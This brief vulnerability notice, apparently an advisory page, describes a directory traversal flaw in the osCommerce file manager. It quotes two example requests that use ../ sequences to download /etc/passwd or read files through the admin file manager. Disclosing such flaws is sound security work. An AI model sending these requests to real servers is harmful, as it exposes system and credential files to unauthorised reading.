|
osCommerce File Manager Directory Traversal Vulnerability
No exploit is required, but Rene <l0om@excluded.org> suggested that an appropriate request to exploit this vulnerability could be: file_manager.php?action=download&filename=../../../../../../etc/passwd An additional exploit was provided by Megasky <magasky@hotmail.com>: /admin/file_manager.php?action=read&filename=../../../../ |
|
|
Privacy Statement |
